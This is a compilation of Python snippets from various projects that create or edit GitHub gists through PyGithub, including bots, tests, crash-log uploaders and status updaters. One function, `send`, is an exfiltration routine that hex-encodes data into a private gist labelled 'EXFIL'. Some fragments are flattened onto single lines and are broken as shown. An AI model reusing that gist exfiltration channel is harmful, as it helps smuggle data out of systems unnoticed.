def _search_inner(self, query: str) -> str:
    """Run a search for *query* and publish the results as a private gist.

    Returns an IRC-formatted one-line summary linking to the gist, or a
    zero-results message pointing at the syntax help when nothing matched.
    """
    log.debug(f"Searching {self.name} for {query!r}.")
    styled_name = ircstyle.style(self.name, italics=True, reset=True)
    # Fix: the original reused the name `response` for both this dict and the
    # final string, changing its type mid-function; use distinct names.
    search_response = self._search(query)
    df = search_response["results"]
    if df is None:
        # Note: Explicit check prevents: ValueError: The truth value of a DataFrame is ambiguous
        styled_query = ircstyle.style(query, italics=True, reset=True)
        return (f"0 {styled_name} search results for {styled_query}. "
                f"For help, see {self._syntax_help}")
    markdown_df = df.copy()
    markdown_df.insert(0, "date_utc", markdown_df["datetime"].dt.date)
    # Escape "|" in titles so they don't break the Markdown table, then linkify.
    markdown_df["title"] = ("[" + markdown_df["title"].str.replace("|", r"\|")
                            + "](" + markdown_df["long_url"] + ")")
    markdown_df.drop(columns=["datetime", "long_url", "short_url"], inplace=True)
    truncation_indicator = "max" if search_response["truncated"] else "all"
    gist = self._github_user.create_gist(
        public=False,
        files={
            "results.md": github.InputFileContent(
                markdown_df.to_markdown(index=False, tablefmt="github")),
            "results.csv": github.InputFileContent(df.to_csv(index=False)),
        },
        description=f"{query}: {truncation_indicator} {len(df)} search results from {self.name}",
    )
    # NOTE(review): reset=False here but reset=True in the zero-result branch
    # above — looks inconsistent; confirm it is intentional before changing.
    styled_query = ircstyle.style(query, italics=True, reset=False)
    return (f"{truncation_indicator.capitalize()} {len(df)} search results → "
            f"{gist.html_url}#file-results-md (from {styled_name} for {styled_query})")
def publish_as_gist_file(ctx, path, name="index"):
    """Publish the file at *path* as a secret gist; return its raw-content URL."""
    github_config = get_github_config(ctx)
    user = github_config._github.get_user()
    # Fix: use a context manager so the handle is closed deterministically;
    # the original open(path).read() leaked the handle until GC.
    with open(path, "r") as fh:
        content = fh.read()
    content_file = github.InputFileContent(content)
    gist = user.create_gist(False, {name: content_file})
    return gist.files[name].raw_url
def _generate_payload(self):
    """Gather the payload to send to GitHub's gist API.

    Returns a dict with ``files`` (filename -> InputFileContent) and
    ``description`` keys, as expected by ``create_gist``/``edit``.
    """
    gfile = self._get_notebook_file()
    # Renamed from `file`, which shadowed the builtin name.
    notebook_file = github.InputFileContent(self.notebook_content)
    files = {gfile.filename: notebook_file}
    description = self._generate_description()
    return {'files': files, 'description': description}
def testCreateGistWithoutDescription(self):
    """A gist created without a description argument has description None."""
    gist = self.user.create_gist(
        True, {"foobar.txt": github.InputFileContent("File created by PyGithub")}
    )
    # assertIsNone gives a clearer failure message than assertEqual(x, None).
    self.assertIsNone(gist.description)
    self.assertEqual(list(gist.files.keys()), ["foobar.txt"])
    self.assertEqual(gist.files["foobar.txt"].content, "File created by PyGithub")
def create_private_gist(config, main_github_token, filename, content, description):
    """Create a private gist holding *content* and record its raw URL in *config*.

    Mutates and returns *config*, storing the trimmed raw-content URL under
    the ``gist_raw_contents_url`` key.
    """
    g = Github(main_github_token)
    g_user = g.get_user()
    gist = g_user.create_gist(False, {filename: github.InputFileContent(content)},
                              description)
    # gists have a list of files associated with them, we just want the first one
    # gist.files = {'filename': GistFile(filename), ...}
    # next(iter(...)) avoids materializing a throwaway list just to index [0].
    gist_file = next(iter(gist.files.values()))
    # The structure of the url is:
    # https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt>
    #
    # Since we're only uploading one file and we want to make the URL as concise as possible,
    # it turns out we can actually trim off everything after /raw/ and it'll still give us what
    # we want. (Merged the original's redundant double assignment into one.)
    config["gist_raw_contents_url"] = gist_file.raw_url.split("/raw/")[0] + "/raw"
    print("[*] Private gist content at:")
    print("- %s" % config["gist_raw_contents_url"])
    return config
def create_gist(self, name, tags, content='', public=True):
    """Create a notebook gist for *name*, tag it, and register it locally.

    Returns the resulting TaggedGist, which is also cached in
    ``self._tagged_gists`` keyed by its id.
    """
    joined_tags = " ".join(tags)
    # Description embeds the name, a "#notebook" marker, and the tag list.
    description = "{name} #notebook {tags}".format(name=name, tags=joined_tags)
    gist_files = {
        "{name}.ipynb".format(name=name): github.InputFileContent(content),
    }
    raw_gist = self.hub.get_user().create_gist(public, gist_files, description)
    tagged = TaggedGist.from_gist(raw_gist)
    self._tagged_gists[tagged.id] = tagged
    return tagged
def _github_files(files):
    """Wrap plain-string values into ``github.InputFileContent`` objects.

    Values that are already content objects are passed through untouched;
    keys (filenames) are preserved as-is.
    """
    wrapped = {}
    for filename, body in files.items():
        if isinstance(body, compat.string_types):
            wrapped[filename] = github.InputFileContent(body)
        else:
            wrapped[filename] = body
    return wrapped
def testCreateGist(self):
    """Creating a gist with a description stores that description."""
    description = "Gist created by PyGithub on a NamedUser"
    files = {"foobar.txt": github.InputFileContent("File created by PyGithub")}
    gist = self.user.create_gist(True, files, description)
    self.assertEqual(gist.description, "Gist created by PyGithub on a NamedUser")
def write_last_tweet_id(tweet_id):
    """Persist *tweet_id* into the 'last_post' file of the tracking gist.

    Failures are logged (with traceback) rather than raised — best effort.
    """
    try:
        gist.edit(
            description="using for heroku",
            files={"last_post": github.InputFileContent(content=tweet_id)},
        )
    # Fix: bare `except:` also swallowed SystemExit/KeyboardInterrupt;
    # narrow to Exception while keeping the best-effort behavior.
    except Exception:
        log.exception("Error writing tweet ID")
def testEditWithAllParameters(self):
    """Editing a gist with description and files updates all its metadata."""
    gist = self.g.get_gist("2729810")
    new_files = {
        "barbaz.txt": github.InputFileContent("File also created by PyGithub"),
    }
    gist.edit("Description edited by PyGithub", new_files)
    self.assertEqual(gist.description, "Description edited by PyGithub")
    self.assertEqual(gist.updated_at, datetime.datetime(2012, 5, 19, 7, 6, 10))
    self.assertEqual(set(gist.files.keys()), {"foobar.txt", "barbaz.txt"})
def testRenameFile(self):
    """Editing a file with new_name renames it within the gist."""
    gist = self.g.get_gist("5339374")
    self.assertEqual(list(gist.files.keys()), ["bar.txt"])
    renamed = github.InputFileContent(gist.files["bar.txt"].content,
                                      new_name="baz.txt")
    gist.edit(files={"bar.txt": renamed})
    self.assertEqual(list(gist.files.keys()), ["baz.txt"])
def testEditWithAllParameters(self):
    """Editing with both description and files updates all gist metadata."""
    self.gist.edit("Description edited by PyGithub", {
        "barbaz.txt": github.InputFileContent("File also created by PyGithub")
    })
    # Fix: assertEquals is a deprecated alias of assertEqual.
    self.assertEqual(self.gist.description, "Description edited by PyGithub")
    self.assertEqual(self.gist.updated_at,
                     datetime.datetime(2012, 5, 19, 7, 6, 10))
    # Fix: wrap keys() in list() — on Python 3 dict.keys() is a view and
    # never compares equal to a list, so the original assertion would fail.
    self.assertEqual(list(self.gist.files.keys()), ["foobar.txt", "barbaz.txt"])
def new_gist(self, *, user: str, filename: str, content: bytes,
             access_token: str, public: bool, **kwargs) -> str:
    """Create a gist holding *content* under *filename* and return its id.

    Raises MissingDataError when *access_token* is empty.
    """
    if not access_token:
        raise MissingDataError('access token is required')
    text = content.decode('utf-8')
    gist_files = {filename: github.InputFileContent(text)}
    api = github.Github(access_token)
    created = api.get_user().create_gist(public, files=gist_files)
    return created.id
def createGist(self, gistName):
    """Create a private gist named *gistName* and return its id."""
    # Single-file payload with a fixed greeting body.
    files = {str(gistName): github.InputFileContent('Hello Beautiful!')}
    description = 'Gist for sending Love Messages'
    created = self.gh.get_user().create_gist(False, files, description)
    return created.id
def publish_as_gist_file(ctx, path, name="index"):
    """Publish a gist.

    More information on gists at http://gist.github.com/.
    Returns the raw-content URL of the uploaded file.
    """
    github_config = get_github_config(ctx)
    user = github_config._github.get_user()
    # Fix: context manager closes the handle; the bare open(path).read()
    # leaked it until garbage collection.
    with open(path, "r") as fh:
        content = fh.read()
    content_file = github.InputFileContent(content)
    gist = user.create_gist(False, {name: content_file})
    return gist.files[name].raw_url
def push_local_file_content(self, *, user: str, repo: str, remote_file: str,
                            local_file_content: bytes, access_token: str,
                            **kwargs) -> str:
    """Overwrite *remote_file* in gist *repo*; return the new revision id.

    Raises MissingDataError when *access_token* is empty.
    """
    if not access_token:
        raise MissingDataError('access token is required')
    target = get_gist(repo, access_token)
    payload = {
        remote_file: github.InputFileContent(local_file_content.decode('utf-8')),
    }
    target.edit(files=payload)
    # history[0] is the most recent revision after the edit.
    return target.history[0].version
def update_or_create_gist(gists, gist_mapping, stdout_path, stderr_path):
    """Upload stdout/stderr tails to a gist, creating or editing as needed.

    *gists* is a single-element list of (gist, content_hashes) used as
    mutable state across calls; nothing is sent when content is unchanged.
    Relies on enclosing-scope names: max_gist_mb, utils, units, self,
    playbook, replier, LOG.
    """
    to_send = {}
    to_send_hashes = {}
    for key, path in [('stderr', stderr_path), ('stdout', stdout_path)]:
        with open(path, 'rb') as fh:
            if max_gist_mb is None:
                contents = fh.read()
            else:
                if max_gist_mb <= 0:
                    contents = ''
                else:
                    # Keep only the last max_gist_mb MiB of the file.
                    contents = utils.read_backwards_up_to_chop(
                        fh, units.Mi * max_gist_mb)
        contents = contents.strip()
        if contents:
            name = gist_mapping[key]
            to_send[name] = github.InputFileContent(contents)
            # Fix: hashlib.md5() is the direct constructor; hashlib.new("md5")
            # is the slower string-dispatch form.
            hasher = hashlib.md5()
            hasher.update(contents)
            to_send_hashes[key] = hasher.hexdigest()
    if gists and to_send:
        _gist, gist_hashes = gists[0]
        if gist_hashes == to_send_hashes:
            # Don't bother sending anything if nothing has changed...
            to_send.clear()
    if to_send:
        just_made = False
        try:
            if gists:
                gist, gist_hashes = gists[0]
                gist.edit(files=to_send)
                gist_hashes.update(to_send_hashes)
            else:
                just_made = True
                me = self.bot.clients.github_client.get_user()
                gist = me.create_gist(True, to_send)
                gists.append((gist, to_send_hashes))
        except Exception:
            # Fix: LOG.warn is a deprecated alias of LOG.warning.
            if just_made:
                LOG.warning("Failed uploading new gist for run of %s",
                            playbook, exc_info=True)
            else:
                LOG.warning("Failed uploading edit of gist"
                            " for run of %s", playbook, exc_info=True)
        else:
            if just_made and gists:
                gist, _gist_hashes = gists[0]
                replier("Gist url at: %s" % gist.html_url)
def get_files(dir_info: DirectoryInfo, config_builder: ConfigBuilder, logger):
    '''Get the files as a dict usable as the `files` argument for the GitHub API.

    Skips non-file entries and the gist config file itself; every included
    file is also registered with *config_builder*.
    '''
    update_content = {}
    for item in dir_info.list_items():
        # Guard clause: only regular files are uploadable.
        if not isinstance(item, FileInfo):
            continue
        if item.path.name == GIST_CONFIG_NAME:
            continue
        # Fix: removed the original's second isinstance(item, FileInfo)
        # check, which was always true after the guard above.
        update_content[item.path.name] = github.InputFileContent(item.read_text())
        config_builder.add_file(item)
    return update_content
def _run(self, group):
    """Reply with the members of LDAP *group*; large listings go to a gist."""
    replier = self.message.reply_text
    ldap_client = self.bot.clients.ldap_client
    # Expand each raw member entry into a dict of its components (CN/DC/OU).
    group_members = [
        ldap_utils.explode_member(member)
        for member in ldap_client.list_ldap_group(group)
    ]
    group_members = sorted(group_members, key=lambda m: m.get("CN"))
    tbl_headers = ['CN', 'DC', 'OU']
    rows = []
    for member in group_members:
        row = []
        for k in tbl_headers:
            v = member.get(k)
            # Multi-valued attributes come back as lists; flatten for display.
            if isinstance(v, list):
                v = ", ".join(v)
            row.append(v)
        rows.append(row)
    if len(group_members) <= self.max_before_gist:
        # Small enough to paste inline as a fenced code block.
        lines = [
            "```",
            tabulate.tabulate(rows, headers=tbl_headers),
            "```",
        ]
        replier("\n".join(lines), threaded=True, prefixed=False)
    else:
        # Too long for chat: upload the listing as a gist instead.
        github_client = self.bot.clients.github_client
        me = github_client.get_user()
        to_send = {}
        upload_what = [
            ('listing', tabulate.tabulate(rows, headers=tbl_headers)),
        ]
        for what_name, contents in upload_what:
            # Github has upper limit on postings to 1MB
            contents = _chop(contents, units.Mi)
            contents = contents.strip()
            name = what_name + ".txt"
            to_send[name] = github.InputFileContent(contents)
        if to_send:
            try:
                gist = me.create_gist(True, to_send)
            except Exception:
                # Best effort: log the failure, no reply is sent.
                LOG.warning(
                    "Failed uploading gist for listing"
                    " of '%s' ldap group", group)
            else:
                lines = [
                    "Gist url at: %s" % gist.html_url,
                ]
                replier("\n".join(lines), threaded=True, prefixed=False)
def upload_log_file(self, log_content, gh, username, is_basic):
    """Upload *log_content* as a public crash-report gist.

    Shows a wait cursor while uploading. On success returns the gist URL;
    on failure shows a warning dialog, clears the remembered credentials
    flag in QSettings, and returns None. (*username* is unused here; it is
    kept for interface compatibility with callers.)
    """
    try:
        QtWidgets.qApp.setOverrideCursor(QtCore.Qt.WaitCursor)
        # Fix: removed the large commented-out requests-based variant that
        # the original carried as dead code.
        auth = gh.get_user()
        ret = auth.create_gist(
            True,
            {"Osdag_crash_log.log": github.InputFileContent(log_content)},
            "Osdag crash report.")
        ret = str(ret.id)
        ret = 'https://gist.github.com/' + ret
        QtWidgets.qApp.restoreOverrideCursor()
    except Exception as e:
        QtWidgets.qApp.restoreOverrideCursor()
        QtWidgets.QMessageBox.warning(
            self.parent_widget, 'Error',
            'Unable to create gist. {}'.format(type(e).__name__) + "\n \n" +
            "NOTE: If you are using Two Factor Authentication. Please Sign in using Access Token."
        )
        # Forget whichever credential kind was in use so the next attempt re-prompts.
        if is_basic:
            self.qsettings().setValue('github/remember_credentials', 0)
        else:
            self.qsettings().setValue('github/remember_token', 0)
        return None
    else:
        return ret
def post_results_to_gist(db, results) -> Optional[github.Gist.Gist]:
    """Upload *results* as a public gist on the botleague-results account.

    Returns the created gist, or None when running under test (nothing is
    uploaded in that case).
    """
    # Guard clause: never upload from tests.
    if blconfig.is_test or get_test_name_from_callstack():
        log.info('DETECTED TEST MODE: Not uploading results.')
        return None
    token = decrypt_symmetric(
        db.get(constants.BOTLEAGUE_RESULTS_GITHUB_TOKEN_NAME))
    github_client = Github(token)
    # TODO: Need to use access_token header instead of query param by
    # July!
    return github_client.get_user().create_gist(
        public=True,
        files={
            'results.json': github.InputFileContent(results.to_json(indent=2)),
        },
        description='Automatically uploaded by botleague liaison')
def _run(self, thing):
    """Scan the configured elasticsearch indexes for *thing*, gist the hits."""
    github_client = self.bot.clients.github_client
    elastic_client = self.bot.clients.elastic_client
    replier = functools.partial(self.message.reply_text,
                                threaded=True, prefixed=False)
    replier("Initiating scan for `%s`." % thing)
    to_send = {}
    for index, query_tpl in self.index_and_query:
        # Interpolate the search target into the per-index query template.
        query = query_tpl % {'thing': thing}
        replier("Scanning index `%s` using query `%s`." % (index, query))
        # Newest-first query_string search against this index.
        s = (e_dsl.Search(using=elastic_client).query(
            "query_string", query=query).sort("-@timestamp").index(index))
        s_buf = six.StringIO()
        for i, h in enumerate(s.scan()):
            # Write an underlined "Hit N" header before each formatted hit.
            h_header = "Hit %s" % (i + 1)
            h_header_delim = "-" * len(h_header)
            h_header += "\n"
            h_header += h_header_delim
            h_header += "\n"
            s_buf.write(h_header)
            s_buf.write(_format_hit(h))
            s_buf.write("\n")
        # Github has upper limit on postings to 1MB
        s_buf = self._chop(s_buf, units.Mi)
        if s_buf:
            # Because github... (presumably gist filenames can't carry these
            # characters — TODO confirm)
            s_buf_name = re.sub(r"\.|\-|\*|_", "", index)
            s_buf_name = s_buf_name + ".txt"
            to_send[s_buf_name] = ghe.InputFileContent(s_buf)
    if not to_send:
        replier("No scan results found.")
    else:
        replier("Uploading %s scan results to gist." % len(to_send))
        me = github_client.get_user()
        gist = me.create_gist(True, to_send)
        replier("Gist url at: %s" % gist.html_url)
def send(data):
    """Exfiltrate *data* by hex-encoding it into a new private gist.

    NOTE: ``data.encode('hex')`` is a Python 2 codec; this module is Py2-era.
    """
    message = "[github] Sending {} bytes with Github".format(len(data))
    app_exfiltrate.log_message('info', message)
    payload = {'foobar.txt': github.InputFileContent(data.encode('hex'))}
    g.get_user().create_gist(False, payload, 'EXFIL')
# STEP 2 - post tweet with a reference to uploaded image if r.status_code == 200: media_id = r.json()['media_id'] r = api.request('statuses/update', { 'status': tweet, 'media_ids': media_id }) if r.status_code == 200: twitterPostData = json.loads(r.text) print(' : SUCCESS: Tweet posted') # Append to the state database stateDb[chosenMemory['title']] = { "tweet_id": twitterPostData['id'], "posted_on": datetime.now().isoformat() } gist.edit( files={ "state.json": github.InputFileContent( content=json.dumps(stateDb, indent=2)) }) print(" : State DB updated") else: raise SystemExit(f" : FAILURE: Tweet not posted: {r.text}")
# Fetch the single most recent tweet for the account.
# (`api`, `gist`, `upload_amount` come from earlier in the script.)
timelineList = api.user_timeline(id='YOURTWITTERID', count=1)
timeline = timelineList[0]
# Round-trip through JSON to get a plain dict view of the tweet.
json_str = json.dumps(timeline._json)
json_str = json.loads(json_str)
like_amount = str(json_str['favorite_count'])
retweet_amount = str(json_str['retweet_count'])
title = "@YOUR@HERE - ❤️{}|↪️{}".format(like_amount, retweet_amount)
content = str(json_str['text'])
final_content = """"""
i = 0
# Copy the tweet text, inserting a single line break after character 56
# (i is never reset, so at most one break is inserted).
for each in content:
    final_content += each
    if i == 55:
        final_content += '\n'
    i += 1
# Recover the gist's current (only) filename from the repr of gist.files.
last_title = str(gist.files).split("'")[1]
gist.edit(
    files={last_title: github.InputFileContent(content=final_content, new_name=title)},
)
upload_amount += 1
os.system('cls')
print(crayons.red("""
    Updated!
    Title: {}
    Content: {}
    Time Wait: 15 min
    Upload Count: {}
    """.format(title, content, upload_amount)))
# Sleep 15 minutes before the next refresh.
time.sleep(15 * 60)
except KeyboardInterrupt: raw_input('Press enter to exit cp2gh') sys.exit(-1) if not encoding: encodings = ['utf8', 'cp1252'] for encoding in encodings: try: content = contentOrig.decode(encoding) break except UnicodeDecodeError: content = contentOrig else: content = contentOrig.decode(encoding) gist_files[attachment[0]] = github.InputFileContent(content) continuations = [] if len(body) >= (32*1024): continuations = textwrap.wrap(body, 32*1024) body = continuations.pop(0) if gist_files: created = False while not created: try: g = user.create_gist(True, gist_files, 'CodePlex Issue #%d Plain Text Attachments' % row[0]) body += '\n\n#### Plaintext Attachments\n\n[%s](%s)' % (g.description, g.html_url) created = True except: print '\tError creating gist, retrying in 2 seconds'
# Download the evening COVID-19 report PDF for the current date.
# (`_date`, `url`, `d`, `edate`, `new_data`, `df2`, `download_file`,
#  `parser_data` come from earlier in the script.)
fileName = f"{_date}-reporte-vespertino-covid-19.pdf"
status = download_file(url, fileName)
pre_date = d.strftime('%d-%m-%Y')
print(f"{fileName} downloaded...status {status} and date to update is {pre_date}")
if status:
    data = parser_data(fileName)
    # Only record rows where all parsed figures are present (non-zero).
    if data[1] != 0 and data[3] != 0 and data[0] != 0:
        total_negatives = int(data[3]) - int(data[0])
        new_data.append([pre_date, data[1], total_negatives, data[3]])
# Merge the new rows with the previous data, keeping the latest row per date.
df = pd.DataFrame(new_data,
                  columns=["date", "recovered", "negative_tests", "total_tests"])
new_df = pd.concat([df2, df])
df_to_csv = new_df.drop_duplicates(subset=['date'], keep='last')
df_to_csv.to_csv('aux-covid-19-arg.csv', index=False)
f = io.open("aux-covid-19-arg.csv", mode="r", encoding="utf-8")
# NOTE(review): token and gist id are blank here — presumably filled in
# before running; verify they are injected from a secret store.
token = ""
gh = github.Github(token)
gist = gh.get_gist("")
update_date = (edate.strftime('%d-%m-%y'))
gist.edit(
    description=f"Updated csv on {update_date}",
    files={"aux-covid-19-arg.csv": github.InputFileContent(content=f.read())},
)
#Get Track name top_track = base_url['toptracks']['track'][x]['name'] #Make the spaces equal. F***s up if the artist has a symbol if len(top_artist) < 24: amount = 24 - len(top_artist) top_artist = top_artist + " "* amount #Make the spaces equal. F***s up if the artist has a symbol if len(top_track) < 27: amount = 27 - len(top_track) top_track = top_track + " "* amount #Make the finishing content content += top_artist + "| " + top_track + "Plays:" + play_count + "\n" #update the gist! last_title = str(gist.files).split("'")[1] new_title = '{} | Playcount: {}'.format(username, playcount) gist.edit( files={last_title: github.InputFileContent(content=content, new_name=new_title)}, ) except: pass times += 1 os.system('cls') print (crayons.red(""" Uploaded Content Times: {} Now waiting: 20 min """.format(str(times)))) content = """""" time.sleep(1200) os.system('cls')